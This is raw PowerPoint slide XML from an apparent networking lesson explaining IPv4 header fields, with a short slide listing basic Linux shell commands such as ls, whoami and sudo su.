                  <a:lnTo>
                    <a:pt x="166242" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4039996" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4084193" y="5937"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4123906" y="22695"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4157551" y="48688"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4183544" y="82333"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4200302" y="122046"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4206240" y="166243"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4206240" y="1496415"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4200302" y="1540618"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4183544" y="1580337"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4157551" y="1613987"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4123906" y="1639984"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4084193" y="1656745"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4039996" y="1662683"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="166242" y="1662683"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="122046" y="1656745"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="82333" y="1639984"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="48688" y="1613987"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22695" y="1580337"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5937" y="1540618"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1496415"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="166243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2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B5CD449E-DBAA-8529-F15C-F0C81D595F02}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5680328" y="3006928"/>
            <a:ext cx="13931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2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E7A16246-36BF-5601-5F68-A995B8C4DEFE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3499103" y="3255264"/>
            <a:ext cx="774700" cy="390525"/>
            <a:chOff x="3499103" y="3255264"/>
            <a:chExt cx="774700" cy="390525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0281EF4E-C92E-1A59-46FA-EBC39EEA8E74}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3505199" y="3261360"/>
              <a:ext cx="762000" cy="378460"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="762000" h="378460">
                  <a:moveTo>
                    <a:pt x="573024" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="573024" y="94487"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="94487"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="283463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="573024" y="283463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="573024" y="377951"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="762000" y="188975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266D10CC-26A9-DF21-E48F-281B8C7AAFC1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3505199" y="3261360"/>
              <a:ext cx="762000" cy="378460"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="762000" h="378460">
                  <a:moveTo>
                    <a:pt x="0" y="94487"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="573024" y="94487"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="573024" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="762000" y="188975"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="573024" y="377951"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="573024" y="283463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="283463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="94487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6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{586CE085-1590-D56F-0263-ED3FFCB531D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73A68F6B-8767-4BE7-013B-100F20793F1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27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597912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06335CE-4BF8-5D06-ADE1-1EC5804DD6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276" y="114045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2 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Example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180" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>–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IP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Header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9835C46-0E51-EAA9-A9C2-39DC3595F67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73FD52B-AD67-42B2-D643-07209F632B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28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3754F27-26DD-C1BB-973C-544451467145}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="410667" y="1090421"/>
            <a:ext cx="79070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example,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IP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header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least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160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bits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(20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bytes)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long,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includes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information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interpret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content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IP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packet.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63ED5CD-6864-A42B-9578-04156B71AD69}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1662176" y="2243074"/>
            <a:ext cx="5496560" cy="2541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  <a:tabLst>
                <a:tab pos="1778635" algn="l"/>
                <a:tab pos="3462654" algn="l"/>
                <a:tab pos="5145405" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" spc="-50" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>0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1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2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3</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="95885">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pP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1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2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3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4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5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6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7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8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9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1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2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3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4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5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6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7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8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9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1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2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3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4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5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6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7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8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9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50" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>1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937260" algn="l"/>
                <a:tab pos="1359535" algn="l"/>
                <a:tab pos="3630295" algn="l"/>
                <a:tab pos="5398135" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" spc="-10" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>|Version|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25" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>IHL</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>	|Type</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-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of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Service|</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>	Total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Length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854075" algn="l"/>
                <a:tab pos="2705735" algn="l"/>
                <a:tab pos="3799204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Identification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|Flags|</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>	Fragment</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-30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Offset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264160" algn="l"/>
                <a:tab pos="1778635" algn="l"/>
                <a:tab pos="2705735" algn="l"/>
                <a:tab pos="3546475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Time</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-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to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Live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Protocol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Header</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-20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Checksum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031364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Source</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-10" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> Address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1778635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Destination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Address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1778635" algn="l"/>
                <a:tab pos="4051300" algn="l"/>
                <a:tab pos="4472940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Options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Padding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64397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2D67DA6-241A-C6EE-3D65-07B3DB99E4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276" y="114045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2 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Example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180" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>–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IP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Header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7080940-BB46-8117-28E3-8DF81B82BD20}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="410667" y="1336294"/>
            <a:ext cx="80225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first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four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bits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identify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IP</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1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version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Today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they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be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represent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IP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version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4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6.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8A56D19-6797-4771-FF2B-9B70CD08399C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1662176" y="2319274"/>
            <a:ext cx="5496560" cy="2541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  <a:tabLst>
                <a:tab pos="1778635" algn="l"/>
                <a:tab pos="3462654" algn="l"/>
                <a:tab pos="5145405" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" spc="-50" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>0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1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2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3</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="95885">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pP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1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2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3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4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5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6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7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8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9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1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2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3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4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5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6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7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8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9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1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2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3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4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5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6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7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8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9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50" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>1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937260" algn="l"/>
                <a:tab pos="1359535" algn="l"/>
                <a:tab pos="3630295" algn="l"/>
                <a:tab pos="5398135" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" spc="-10" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>|</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" b="1" spc="-10" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Version</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-1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25" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>IHL</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>	|Type</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-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of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Service|</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>	Total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Length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854075" algn="l"/>
                <a:tab pos="2705735" algn="l"/>
                <a:tab pos="3799204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Identification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|Flags|</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>	Fragment</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-30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Offset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264160" algn="l"/>
                <a:tab pos="1779270" algn="l"/>
                <a:tab pos="2705735" algn="l"/>
                <a:tab pos="3547110" algn="l"/>
                <a:tab pos="5398770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Time</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-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to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Live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Protocol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Header</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-20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Checksum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031364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Source</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-10" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> Address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1778635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Destination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Address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1778635" algn="l"/>
                <a:tab pos="4051300" algn="l"/>
                <a:tab pos="4472940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Options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Padding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CA861A1B-8393-F140-135E-197A42FEA9B3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="696468" y="2798064"/>
            <a:ext cx="817244" cy="273050"/>
            <a:chOff x="696468" y="2798064"/>
            <a:chExt cx="817244" cy="273050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5073BE19-2BD1-9648-F8CF-18BEE797AEF0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="702564" y="2804160"/>
              <a:ext cx="805180" cy="260985"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="805180" h="260985">
                  <a:moveTo>
                    <a:pt x="674370" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="674370" y="65150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="65150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="195452"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="674370" y="195452"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="674370" y="260603"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="804672" y="130301"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6743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D070D87D-4192-20F6-9765-F93AEF1BB9E8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="702564" y="2804160"/>
              <a:ext cx="805180" cy="260985"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="805180" h="260985">
                  <a:moveTo>
                    <a:pt x="0" y="65150"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="674370" y="65150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="674370" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="804672" y="130301"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="674370" y="260603"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="674370" y="195452"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="195452"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="6515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6DDDD24E-9CF6-D765-9F12-E1463FC704B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52A19A7D-A048-947A-8A76-7394BF9BB038}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8130464" y="4836077"/>
            <a:ext cx="280670" cy="17399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b="1" spc="-20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="252525"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t>p.13</a:t>
            </a:r>
            <a:endParaRPr sz="10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6057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14351" y="1033526"/>
            <a:ext cx="9173210" cy="3347085"/>
            <a:chOff x="-13716" y="1034796"/>
            <a:chExt cx="9173210" cy="3347085"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="object 4"/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3</a:t>
            </a:fld>
            <a:endParaRPr spc="-20" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="object 7"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600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1.2 All Kali Linux commands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85140" y="1706880"/>
            <a:ext cx="2515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ls (list file) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>  ls    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219075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3632200" y="1962150"/>
            <a:ext cx="3881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view the all file in the directory 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09600" y="233045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ls -la  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05660" y="257175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3657600" y="2419350"/>
            <a:ext cx="3183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view all information about file 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411480" y="2698750"/>
            <a:ext cx="115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whoami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05660" y="292989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Text Box 27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3657600" y="2800350"/>
            <a:ext cx="3214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view username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457200" y="3105150"/>
            <a:ext cx="115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sudo su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105660" y="333375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Text Box 30"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3733800" y="3168650"/>
            <a:ext cx="1865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/>
              <a:t>Convert to root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> 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457200" y="3511550"/>
            <a:ext cx="115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clear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105660" y="373761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>
            <a:off x="3750945" y="3564255"/>
            <a:ext cx="2154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clear the screen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1397F1B-45DF-5CF9-9236-87F1BA32A8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276" y="114045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2 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Example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180" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>–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IP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Header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299C3A2-CFB4-1EE1-9194-466350B13444}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="410667" y="1336294"/>
            <a:ext cx="74695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32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bits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starting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position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96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represent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source address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07A4ECC-0947-209A-0277-FC43F58A3F2F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1745995" y="2008124"/>
            <a:ext cx="51587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4814" algn="l"/>
                <a:tab pos="3378835" algn="l"/>
                <a:tab pos="5061585" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" spc="-50" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>0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1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2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3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8FB3BE3-B909-610A-5DB8-5AF5BFB926BC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1662176" y="2175764"/>
            <a:ext cx="5496560" cy="237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1</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="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2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3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4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5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6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7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8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9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1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2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3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4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5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6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7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8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9</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="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1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2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3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4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5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6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7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8</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="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9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50" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>1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937260" algn="l"/>
                <a:tab pos="1359535" algn="l"/>
                <a:tab pos="3630295" algn="l"/>
                <a:tab pos="5398135" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" spc="-10" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>|Version|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25" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>IHL</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>	|Type</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-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of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Service|</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>	Total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Length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854075" algn="l"/>
                <a:tab pos="2705735" algn="l"/>
                <a:tab pos="3799204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Identification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|Flags|</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>	Fragment</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-30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Offset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264160" algn="l"/>
                <a:tab pos="1778635" algn="l"/>
                <a:tab pos="2705735" algn="l"/>
                <a:tab pos="3546475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Time</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-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to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Live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Protocol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Header</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-20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Checksum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2032000" algn="l"/>
                <a:tab pos="5398770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b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Source</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" b="1" spc="-10" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> Address</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" b="1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1778635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Destination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Address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1778635" algn="l"/>
                <a:tab pos="4051300" algn="l"/>
                <a:tab pos="4472940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Options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Padding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6728596E-279F-4B32-487E-EA15B5879D49}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="696468" y="3486911"/>
            <a:ext cx="817244" cy="273050"/>
            <a:chOff x="696468" y="3486911"/>
            <a:chExt cx="817244" cy="273050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E4F2EA20-5C5C-AEF6-15EA-F9111FC0BE34}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="702564" y="3493007"/>
              <a:ext cx="805180" cy="260985"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="805180" h="260985">
                  <a:moveTo>
                    <a:pt x="674370" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="674370" y="65151"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="65151"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="195453"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="674370" y="195453"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="674370" y="260604"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="804672" y="130302"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6743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DA761E4F-6213-EA46-3A74-D73602664620}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="702564" y="3493007"/>
              <a:ext cx="805180" cy="260985"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="805180" h="260985">
                  <a:moveTo>
                    <a:pt x="0" y="65151"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="674370" y="65151"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="674370" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="804672" y="130302"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="674370" y="260604"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="674370" y="195453"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="195453"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="65151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9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE4732A8-47CC-E661-A8EB-904E6EE602D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5B32C02D-9480-F395-0322-9442BC82246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30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355181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C69F599-D144-E246-6424-2C4306C4AE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276" y="114045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2 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Example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180" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>–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IP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Header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2790FBD-A7A9-66A6-7EF5-9A654159A920}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="410667" y="1299717"/>
            <a:ext cx="804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following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four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bytes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represent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destination</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1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address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6D50412-7BB3-734D-2959-59BD94D6F154}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1662176" y="2008124"/>
            <a:ext cx="5496560" cy="254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  <a:tabLst>
                <a:tab pos="1778635" algn="l"/>
                <a:tab pos="3462654" algn="l"/>
                <a:tab pos="5145405" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" spc="-50" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>0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1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2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3</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="95885">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pP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1</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="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2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3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4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5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6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7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8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9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1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2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3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4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5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6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7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8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9</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="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1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2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3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4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5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6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7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8</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="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9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0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50" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>1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937260" algn="l"/>
                <a:tab pos="1359535" algn="l"/>
                <a:tab pos="3630295" algn="l"/>
                <a:tab pos="5398135" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" spc="-10" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>|Version|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25" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>IHL</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>	|Type</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-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of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Service|</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>	Total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Length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854075" algn="l"/>
                <a:tab pos="2705735" algn="l"/>
                <a:tab pos="3799204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Identification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|Flags|</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>	Fragment</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-30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Offset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264160" algn="l"/>
                <a:tab pos="1778635" algn="l"/>
                <a:tab pos="2705735" algn="l"/>
                <a:tab pos="3546475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Time</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-10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to</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-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Live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Protocol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Header</a:t>
            </a:r>
